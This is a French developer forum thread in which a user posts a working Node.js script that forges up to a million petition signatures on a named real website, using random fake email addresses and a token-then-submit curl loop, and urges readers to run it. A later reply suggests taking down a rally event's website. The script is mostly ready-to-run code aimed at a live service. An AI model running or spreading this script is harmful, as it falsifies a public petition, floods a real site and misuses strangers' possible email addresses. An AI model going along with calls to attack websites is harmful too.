Discussion :

[setni]

Bonjour la communauté,

Je sais que ma démarche n'est pas courante mais j'estime qu'il est de notre devoir en tant que développeurs d'agir.

Voici une pétition qui fait la une de la presse, soutenue par des personnalités. La démarche est noble mais le fond l'est beaucoup moins:

- les emails ne sont pas validés
- il n'y a aucune protection de type failToBan (anti-dos)

Par conséquent, je viens de faire un script, qui en utilisant un générateur d'email, l'a signé plusieurs dizaine de milliers de fois.

Ceci pose un problème grave, sur la base d'une pétition non sécurisée, on tente de forcer l'état, notre démocratie à agir.

Aujourd'hui c'est l'environnement, que se passera-t-il si demain c'est une demande d'envois des immigrés ou des gays dans des camps de concentration?

La cybersécurité est fondamentale dans le fonctionnement de notre société.
Et il est de notre devoir de sécuriser les applis web.
J'ai alerté le Monde sans succès, posté des messages sur Twitter sans réaction.

Voici donc mon script, exécutez le, afin de révéler cette immense farce, si le compteur explose, les médias comprendront que quelque chose ne va pas:

EDIT: pour l'executer: node <nom.js>

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
const { execSync } = require('child_process');

const firstname = [
    'Emma',
    'Lola',
    'Chloe',
    'Ines',
    'Léa',
    'Manon',
    'Jade',
    'Louise',
    'Lena',
    'Lina',
    'Zoe',
    'Lilou',
    'Camille',
    'Sarah',
    'eva',
    'Alice',
    'Maelys',
    'Louna',
    'Romane',
    'Juliette',
    'Nathan',
    'Lucas',
    'Léo',
    'Gabriel',
    'Timeo',
    'Enzo',
    'Louis',
    'Raphael',
    'Arthur',
    'Hugo',
    'Jules',
    'Ethan',
    'Adam',
    'Nolan',
    'Thomas',
    'yves',
    'jacqueline',
    'valery',
    'rene',
    'clement',
    'didier',
    'gerard',
    'chantal',
    'jeanne',
    'genevieve',
    'robert',
    'rob',
    'jeanclaude',
    'petittout',
    'momo',
    'pierre',
    'marie',
    'nathalie',
    'henry',
    'Noah',
    'Theo',
    'Sacha',
    'Mael',
    'Mathis',
];

const lastname = [
    'Martin',
    'Bernard',
    'Thomas',
    'Petit',
    'Robert',
    'Richard',
    'Durand',
    'Dubois',
    'Moreau',
    'Laurent',
    'Simon',
    'Michel',
    'Lefebvre',
    'Leroy',
    'Roux',
    'David',
    'Bertrand',
    'Morel',
    'Fournier',
    'Girard',
    'Bonnet',
    'Dupont',
    'Lambert',
    'Fontaine',
    'Rousseau',
    'Vincent',
    'Muller',
    'Lefevre',
    'Faure',
    'Andre',
    'Mercier',
    'Blanc',
    'Guerin',
    'Boyer',
    'Garnier',
    'Chevalier',
    'Francois',
    'Legrand',
    'Gauthier',
    'Garcia',
    'Perrin',
    'Robin',
    'Clement',
    'Morin',
    'Nicolas',
    'Henry',
    'Roussel',
    'Mathieu',
    'Gautier',
    'Masson',
    'Marchand',
    'Duval',
    'Denis',
    'Dumont',
    'Marie',
    'Lemaire',
    'Noel',
    'Meyer',
    'Dufour',
    'Meunier',
    'Brun',
    'Blanchard',
    'Giraud',
    'Joly',
    'Riviere',
    'Lucas',
    'Brunet',
    'Gaillard',
    'Barbier',
    'Arnaud',
    'Martinez',
    'Gerard',
    'Roche',
    'Renard',
    'Schmitt',
    'Roy',
    'Leroux',
    'Colin',
    'Vidal',
    'Caron',
    'Picard',
    'Roger',
    'Fabre',
    'Aubert',
    'Lemoine',
    'Renaud',
    'Dumas',
    'Lacroix',
    'Olivier',
    'Philippe',
    'Bourgeois',
    'Pierre',
    'Benoit',
    'Rey',
    'Leclerc',
    'Payet',
    'Rolland',
    'Leclercq',
    'Guillaume',
    'Lecomte',
    'Lopez',
    'Jean',
    'Dupuy',
    'Guillot',
    'Hubert',
    'Berger',
    'Carpentier',
    'Sanchez',
    'Dupuis',
    'Moulin',
    'Louis',
    'Deschamps',
    'Huet',
    'Vasseur',
    'Perez',
    'Boucher',
    'Fleury',
    'Royer',
    'Klein',
    'Jacquet',
    'Adam',
    'Paris',
    'Poirier',
    'Marty',
    'Aubry',
];

const domain = ['gmail.com','yahoo.com','hotmail.com', 'hotmail.fr','msn.com','outlook.com','live.com','me.com','aol.com','icloud.com'];
let i;
for (i = 0; i < 1000000 ; i++) {
    let email = firstname[parseInt(((Math.random() * firstname.length) + 1)) - 1].toLowerCase() + '.' +
        lastname[parseInt(((Math.random() * lastname.length) + 1)) - 1].toLowerCase() +
        parseInt(((Math.random() * 30) + 1)) + '%40' +
        domain[parseInt(((Math.random() * domain.length) + 1)) - 1];

    let param = [
        " -XPOST",
        "https://laffairedusiecle.net/petition3.php",
        "-H",
        '"Content-Type: application/x-www-form-urlencoded"',
        "-H",
        '"Host: laffairedusiecle.net"',
        "-H",
        '"Origin: https://laffairedusiecle.net"',
        "-H",
        '"Referer: https://laffairedusiecle.net/"',
        "-H",
        '"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"',
        "-H",
        '"X-Requested-With: XMLHttpRequest"',
        "-H",
        '"cache-control: no-cache"',
        "-d",
        '"action=get&email='+email+'"',
        "2>/dev/null"
    ];
    const ls = execSync("curl " + param.join(' '));
    const token = JSON.parse(ls.toString()).token;

    param = [
        " -XPOST",
        "https://laffairedusiecle.net/petition3.php",
        "-H",
        '"Content-Type: application/x-www-form-urlencoded"',
        "-H",
        '"Host: laffairedusiecle.net"',
        "-H",
        '"Origin: https://laffairedusiecle.net"',
        "-H",
        '"Referer: https://laffairedusiecle.net/"',
        "-H",
        '"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"',
        "-H",
        '"X-Requested-With: XMLHttpRequest"',
        "-H",
        '"petition-token: ' + token +'"',
        "-H",
        '"cache-control: no-cache"',
        "-d",
        '"data%5Boptin%5D=Yes&data%5Butm_campaign%5D=&data%5Butm_medium%5D=&data%5Butm_source%5D=&data%5Butm_content%5D=&data%5Bfirst_name%5D=pawned&data%5Blast_name%5D=pawned&data%5Bemail%5D='+email+'&action=post"',
        "2>/dev/null"
    ];
    console.log(i + ' : ' + email + ' | ' + execSync("curl " + param.join(' ')).toString());
}

[Jipété]

1) pourquoi as-tu posté dans la section Humour ?
2) car je ne sais pas encore s'il faut en rire ou en pleurer.

OK, c'est sûr qu'une appli aussi peu sécurisée c'est grave, mais ce qui se passe au niveau du climat est encore bien plus grave et là, en pointant du doigt qu'on peut trafiquer le compteur de signatures, c'est tout l'édifice de la pétition qui s'écroule…

Admettons que les responsables s'en rendent compte et qu'ils annulent tout en demandant aux gens concernés et de bonne volonté de bien vouloir recommencer, et qu'on se retrouve avec juste 315 signatures au bout d'un mois, qu'est-ce qui va se dire en haut lieu ?
"ok, c'est juste 315 clampins, donc on peut continuer à s'en balec du climat", et je ne suis pas sûr du tout que ça soit une bonne idée.

Là, avec cette histoire, on est franchement dans la m…
Tu parles d'un cadeau de Noël !

HS :

Voici donc mon script, exécutez le,

Manque un trait d'union, là…

[setni]

Salut,

1) pourquoi as-tu posté dans la section Humour ?

Il y a marqué "divers" aussi

OK, c'est sûr qu'une appli aussi peu sécurisée c'est grave, mais ce qui se passe au niveau du climat est encore bien plus grave et là, en pointant du doigt qu'on peut trafiquer le compteur de signatures, c'est tout l'édifice de la pétition qui s'écroule…

C'est justement parce que c'est un sujet grave, dont j'adhere totalement au passage, qu'il faut que ce type de pétition soit indémontable.

Surtout quand on voit la seule justification que j'ai reçue, qui me pose sérieusement des questions sur l'avenir de nos sociétés:
https://twitter.com/CecileDuflot/sta...33667712016384

Merci pour la correction du trait d'union

[Jipété]

Surtout quand on voit la seule justification que j'ai reçue, qui me pose sérieusement des questions sur l'avenir de nos sociétés:
https://twitter.com/CecileDuflot/sta...33667712016384

Bon, ça me rassure un peu.

J'étais justement en train de penser ça, il y a 5 minutes :

Suis en train de me souvenir que, l'ayant signée, j'ai reçu un courriel de remerciement en retour.
Probable que des adresses bidon généreront des retours en erreur à l'expéditeur, qui pourra envisager de supprimer les adresses concernées ?

Donc il y a probablement vraiment 1,6 million de signature valides, ouf !

[setni]

Donc il y a probablement vraiment 1,6 million de signature valides, ouf !

Euh ...

Dans le script que j'ai exécuté, combien d'adresses étaient valides?
Combien de personne, n'ayant jamais été sur le site, ont reçues un email de remerciement?

[mm_71]

Donc il y a probablement vraiment 1,6 million de signature valides, ouf !

On peut en douter, si le site était au moins un tant soit peu sérieux il ferait au moins 2 choses:

1: Vérifier que le mail indiqué existe ( Ce qui limite un peu mais n’empêche pas les usurpations de mails authentiques ).
2: Une mémorisation des IP's ayant déjà voté pour évite à priori une partie des doublons.

De plus pour une pétition qui concerne spécifiquement la France il conviendrait de limiter la possibilité du vote aux seules IP' de FAI's Français, en dehors d'éviter les trolls nichés aux 4 coins de la planète ça permettrait aussi de limiter l'usage des VPN's, en l'état actuel des choses il n'y a sans doute pas grand chose à modifier dans les script pour passer par tor browser et changer de de circuit à chaque envoi pour contourner un éventuel blocage des doublons sur IP's.

Et un truc que je ne m'explique guère c'est ça:

https://mobile.twitter.com/Setni7?p=s

[escartefigue]

C'est justement parce que c'est un sujet grave, dont j'adhere totalement au passage [. . .]
Merci pour la correction du trait d'union

Ce n'était pas la pire

Combien de personne, n'ayant jamais été sur le site, ont reçues un email de remerciement?

Pas mal non plus

[Jipété]

Et pendant qu'on fait ce qu'on peut pour éveiller les consciences (si tant est que ce soit possible…), qu'est-ce que je découvre en 3^e de couv' de mon programme téloche ? Une pleine page pour le Dakar 2019, qui se déroulera au Pérou.
Voilà un site à faire tomber, au nom de la légitime défense, pour ceux qui savent faire (moi pas).
Parce que si c'est pas du foutage de gueule, ça, 8 jours à peine après la COP24 ! Son cadavre est encore tiède…
Car, quand même, entendu parler récemment d'un grand prix de F1 en Arabie Saoudite, mais des F1 électriques ! Alors oui, on peut dire un tas de choses sur l'A.S., mais au moins pour ça, chapeau !

Tout va bien les gars, le bateau coule et on agrandit le trou, pendant que la maison brûle et que certains s'amusent à y balancer de l'huile.

Si vous saviez comme j'en ai marre…

[Invité]

Les courses de voitures électriques seront pour les pays ou il y a du soleil . Regardez ou je me tourne , tiens le qatar, Arabie Saoudite, Oman , Koweit . Comme par hasard les pays ou il y a du pétrole !

C'est pas pour faire planter l’Europe, juste pour rappeler qu'entre 2012 et 2014 une coalition de pays du moyen orient a fait couler un projet européen de centrale solaire ! Résultat des entreprises allemandes, françaises et ibériques ont perdus des contrats pour 400 milliards d'euros sur 20 ans !